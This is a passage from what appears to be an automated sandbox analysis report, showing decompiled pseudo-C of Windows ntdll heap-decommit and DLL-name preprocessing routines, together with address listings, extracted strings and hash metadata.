						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E3416BF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x34266960 - 1;
						if( *0x34266960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									L3416B910();
								} else {
									L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								L3416B910();
								__eflags =  *0x34265da8;
								if( *0x34265da8 == 0) {
									__eflags = 0;
									E3422FC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x34266960 - 1;
							if( *0x34266960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								L3416B910();
							} else {
								L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							L3416B910();
							__eflags =  *0x34265da8;
							if( *0x34265da8 == 0) {
								__eflags = 0;
								E3422FC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = L3416FABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
								L3418096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = E34183C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E3422F13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E34169E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							L3416B9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x34266960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												L3416B910();
											} else {
												L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											L3416B910();
											__eflags =  *0x34265da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E3422FC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											E34235FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									L34180B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = E34183C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = E34183C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3422F058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = E34183C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = E34183C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E3422F058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x34266960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x34266960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												L3416B910();
											} else {
												L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											L3416B910();
											__eflags =  *0x34265da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E3422FC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											E34235FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									L34180B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							L3418096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							L34180B10(_t547, _v60, _v24);
							_t274 = E34183C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = E34183C40();
									if(__eflags != 0) {
										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3422F058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = E34183C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = E34183C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = L3416FABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = E34183C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E3422F13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E34181EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						L34180B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E3416F6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}

0x3416f113
0x3416f120
0x3416f123
0x3416f127
0x3416f137
0x3416f13b
0x341cdc64
0x341cdc67
0x3416f1d5
0x3416f1d5
0x3416f1c7
0x3416f1cd
0x3416f1cd
0x3416f144
0x341cdc75
0x341cdc79
0x341cdc7b
0x341cdc8d
0x341cdc92
0x341cdc94
0x341cdc9a
0x341cdc9a
0x341cdc9a
0x341cdc9a
0x341cdc94
0x341cdca0
0x341cdca3
0x341cdca5
0x3416f202
0x3416f202
0x3416f205
0x3416f207
0x341cdcae
0x3416f20d
0x3416f21b
0x3416f21b
0x3416f21b
0x3416f228
0x3416f22a
0x3416f22e
0x3416f231
0x3416f23f
0x3416f243
0x3416f248
0x3416f24f
0x3416f256
0x3416f259
0x3416f263
0x3416f269
0x3416f26f
0x3416f275
0x3416f278
0x3416f27d
0x3416f45b
0x3416f461
0x3416f461
0x3416f283
0x3416f28d
0x3416f291
0x3416f292
0x3416f295
0x3416f3be
0x3416f3be
0x3416f3be
0x3416f29d
0x3416f2a1
0x3416f494
0x3416f498
0x3416f49d
0x3416f4a1
0x3416f4a5
0x341cdcb5
0x341cdcb7
0x00000000
0x00000000
0x341cdcbd
0x3416f4ab
0x3416f4b2
0x341cdcc2
0x341cdcc4
0x341cdcca
0x341cdcd0
0x341cdcd4
0x341cdcf3
0x341cdcf8
0x341cdcd6
0x341cdceb
0x341cdcf0
0x341cdcfe
0x341cdd03
0x341cdd08
0x341cdd10
0x341cdd12
0x341cdd17
0x341cdd17
0x341cdd1c
0x341cdd20
0x341cdd20
0x341cdcc4
0x3416f4b8
0x3416f4be
0x3416f4c1
0x3416f4c5
0x3416f4c7
0x3416f4cb
0x3416f4cd
0x341cdd28
0x341cdd28
0x3416f4d9
0x3416f4d9
0x3416f4dd
0x3416f4e1
0x341cdd30
0x341cdd37
0x00000000
0x00000000
0x341cdd3d
0x341ce0fe
0x341ce0fe
0x00000000
0x00000000
0x341ce104
0x341ce10a
0x341ce10e
0x341ce12d
0x341ce132
0x341ce110
0x341ce125
0x341ce12a
0x341ce138
0x341ce13d
0x341ce142
0x341ce14a
0x341ce14c
0x341ce151
0x341ce151
0x00000000
0x3416f4e7
0x3416f4f5
0x3416f4fa
0x3416f4fc
0x341cdd44
0x341cdd44
0x341cdd4a
0x341cdd4f
0x341ce159
0x341ce159
0x3416f1d2
0x3416f1d2
0x3416f1d4
0x3416f1d4
0x00000000
0x3416f1d4
0x341cdd6d
0x341ce156
0x341ce156
0x00000000
0x341ce156
0x3416f502
0x3416f507
0x3416f50c
0x3416f50e
0x341cdd80
0x3416f514
0x3416f514
0x3416f514
0x3416f516
0x3416f519
0x341cdd8a
0x341cdd90
0x341cdd97
0x341cdda9
0x341cdda9
0x341cdd97
0x3416f51f
0x3416f523
0x3416f529
0x3416f52c
0x3416f532
0x341cddb3
0x341cddb3
0x3416f53c
0x3416f541
0x3416f54b
0x3416f550
0x3416f55c
0x3416f563
0x3416f56d
0x3416f570
0x3416f575
0x3416f577
0x3416f577
0x3416f577
0x3416f577
0x3416f57d
0x3416f582
0x341cddc2
0x341cddca
0x341cddce
0x341cddda
0x341cddde
0x341cdeaf
0x341cdeb3
0x341cdec1
0x341cdec7
0x341cdec7
0x341cdde4
0x341cdde8
0x341cddea
0x341cdded
0x341cddf7
0x341cddfa
0x341cddfc
0x341cde02
0x341cde08
0x341cde0a
0x341cde0d
0x341cde0f
0x341cde15
0x341cde18
0x341cde37
0x341cde3c
0x341cde1a
0x341cde2f
0x341cde34
0x341cde42
0x341cde47
0x341cde4d
0x341cde53
0x341cde55
0x341cde5a
0x341cde5a
0x341cde5f
0x341cde5f
0x341cde0d
0x341cde63
0x341cde66
0x341cde69
0x341cde72
0x341cde73
0x341cde77
0x341cde7c
0x341cde7e
0x341cde7f
0x341cde80
0x341cde81
0x341cde87
0x341cde88
0x341cde8d
0x341cde91
0x341cde91
0x341cde95
0x341cde95
0x341cde9d
0x341cdea0
0x341cdea5
0x341cdea5
0x341cddde
0x3416f588
0x3416f58d
0x3416f58f
0x341cded7
0x3416f595
0x3416f595
0x3416f595
0x3416f597
0x3416f59a
0x341cdee1
0x341cdeea
0x341cdef0
0x341cdefb
0x341cdefd
0x341cdf08
0x341cdf08
0x341cdf08
0x341cdf2b
0x341cdf2b
0x341cdef0
0x3416f5a0
0x3416f5a5
0x3416f5aa
0x3416f5af
0x3416f5b1
0x341cdf3e
0x3416f5b7
0x3416f5b7
0x3416f5b7
0x3416f5b9
0x3416f5bc
0x341cdf4a
0x341cdf4c
0x341cdf57
0x341cdf57
0x341cdf57
0x341cdf5c
0x341cdf5d
0x341cdf61
0x341cdf7c
0x341cdf88
0x341cdf89
0x341cdf8d
0x341cdf8d
0x00000000
0x3416f5bc
0x3416f4e1
0x3416f2a7
0x3416f2ad
0x3416f2b6
0x3416f2ba
0x3416f2bc
0x341cdf97
0x341cdf9d
0x341cdf9d
0x3416f2c4
0x3416f2c7
0x3416f2cb
0x3416f2cd
0x3416f2d2
0x3416f2d6
0x3416f3c8
0x3416f3c8
0x3416f2dc
0x3416f2e1
0x3416f2e3
0x341ce0ed
0x341ce0f3
0x00000000
0x00000000
0x341ce0f9
0x00000000
0x341ce0f9
0x3416f2e9
0x3416f2eb
0x3416f2ef
0x3416f2f3
0x3416f302
0x3416f302
0x3416f304
0x3416f346
0x3416f346
0x3416f348
0x3416f34c
0x3416f3ea
0x3416f3f2
0x3416f3f6
0x3416f402
0x3416f406
0x341ce046
0x341ce049
0x341ce057
0x341ce05d
0x341ce05d
0x3416f40c
0x3416f410
0x3416f413
0x3416f423
0x3416f426
0x3416f428
0x3416f42e
0x3416f434
0x341cdfe4
0x341cdfe7
0x341cdfed
0x341cdff3
0x341cdff6
0x341ce015
0x341ce01a
0x341cdff8
0x341ce00d
0x341ce012
0x341ce020
0x341ce025
0x341ce02b
0x341ce031
0x341ce033
0x341ce038
0x341ce038
0x341ce03d
0x341ce03d
0x341cdfe7
0x3416f43a
0x3416f43d
0x3416f440
0x3416f442
0x3416f470
0x3416f471
0x3416f475
0x3416f47a
0x3416f47c
0x3416f47d
0x3416f47e
0x3416f47f
0x3416f482
0x3416f483
0x3416f488
0x3416f48c
0x3416f48c
0x3416f444
0x3416f444
0x3416f444
0x3416f446
0x3416f451
0x3416f451
0x3416f406
0x3416f36b
0x3416f37a
0x3416f37f
0x3416f384
0x3416f389
0x3416f38b
0x341ce06d
0x3416f391
0x3416f391
0x3416f391
0x3416f393
0x3416f396
0x341ce077
0x341ce080
0x341ce086
0x341ce091
0x341ce093
0x341ce09e
0x341ce09e
0x341ce09e
0x341ce0bb
0x341ce0bb
0x341ce086
0x3416f39c
0x3416f3a1
0x3416f3a6
0x3416f3a8
0x341ce0ce
0x3416f3ae
0x3416f3ae
0x3416f3ae
0x3416f3b0
0x3416f3b3
0x00000000
0x3416f3b9
0x341ce0dd
0x341ce0df
0x341cdf70
0x341cdf70
0x341cdf70
0x341cdf79
0x341cdf7a
0x341cdf7b
0x00000000
0x341cdf7b
0x3416f3b3
0x3416f306
0x3416f31a
0x3416f31f
0x3416f321
0x00000000
0x00000000
0x3416f327
0x3416f32c
0x3416f32e
0x341cdfaf
0x3416f334
0x3416f334
0x3416f334
0x3416f339
0x3416f33c
0x341cdfb9
0x341cdfc2
0x341cdfc8
0x341cdfda
0x341cdfda
0x341cdfc8
0x3416f342
0x00000000
0x3416f342
0x3416f2f9
0x3416f2fc
0x3416f3d0
0x3416f3d2
0x00000000
0x00000000
0x3416f3d8
0x3416f3db
0x00000000
0x3416f3e1
0x00000000
0x3416f3e1
0x3416f3db
0x00000000
0x3416f2fc
0x3416f14a
0x3416f150
0x341cdc6e
0x00000000
0x341cdc6e
0x3416f159
0x3416f15b
0x3416f162
0x3416f1d0
0x00000000
0x3416f17b
0x3416f184
0x3416f189
0x3416f18c
0x3416f18e
0x3416f19e
0x00000000
0x3416f1a0
0x3416f1a3
0x3416f1b1
0x3416f1ba
0x3416f1be
0x3416f1c5
0x3416f1dc
0x3416f1e4
0x3416f1e9
0x3416f1eb
0x3416f1ef
0x3416f1f4
0x3416f1fa
0x3416f1fa
0x3416f1eb
0x00000000
0x3416f1c5
0x3416f19e

Strings

((LONG)FreeEntry->Size > 1), xrefs: 341CDE42
HEAP[%wZ]: , xrefs: 341CDCE6, 341CDE2A, 341CE008, 341CE120
HEAP: , xrefs: 341CDCF3, 341CDE37, 341CE015, 341CE12D
(UCRBlock != NULL), xrefs: 341CDCFE
(!TrailingUCR), xrefs: 341CE138
(LONG)FreeEntry->Size > 1, xrefs: 341CE020

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 5e36b938f589a75ef365db7053b06310af8a43474b99baad5d700b75ab9b42a4
Instruction ID: b8a22f365a42c623b57fabd99cd6a68e9e09d58bde8bdbe0d61cc2630a9d75fe
Opcode Fuzzy Hash: 5e36b938f589a75ef365db7053b06310af8a43474b99baad5d700b75ab9b42a4
Instruction Fuzzy Hash: 1742DF75204B81DFE301CF28C8C4B6ABBE6FF94648F0549ADE8868B251DB38D955CB52

Uniqueness

Uniqueness Score: -1.00%

Function 3418B0D0 Relevance: 7.8, Strings: 6, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E3418B0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E3418C4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x342637c0 & 0x00000005;
						if(( *0x342637c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E341EE692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							E3417FCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E3418C7E7(_t183, 0x3414116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E34185D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										L341B88C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = E341F3C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
